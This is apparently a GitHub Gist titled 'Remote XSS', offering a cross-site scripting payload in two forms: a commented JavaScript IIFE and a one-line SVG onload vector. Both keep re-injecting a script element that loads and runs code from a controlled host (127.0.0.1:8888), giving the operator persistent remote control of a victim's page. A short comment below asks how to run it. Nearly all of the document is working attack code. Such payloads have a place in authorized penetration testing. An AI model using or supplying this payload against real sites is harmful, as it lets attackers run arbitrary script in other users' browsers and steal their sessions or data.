Last active
August 23, 2018 15:23
-
-
Save bl4de/c797df109bec9bbe91b9 to your computer and use it in GitHub Desktop.
Remote XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // clean JavaScript payload | |
| // I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression) | |
| (function(){ | |
| var d=document,s; // create first <script> element | |
| s=d.createElement('script'); // and append it to body | |
| d.body.appendChild(s); | |
| setInterval(function(){ | |
| d.body.removeChild(s); // remove, then create again and get connection | |
| s=d.createElement('script'); | |
| d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888"; | |
| d.body.appendChild(s); | |
| },0); | |
| } | |
| )() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s); | |
| setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s); | |
| s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hi.. I have one query on IIFE way of running remote-XSS-javascript-part.js...
Can you help me to run the code ?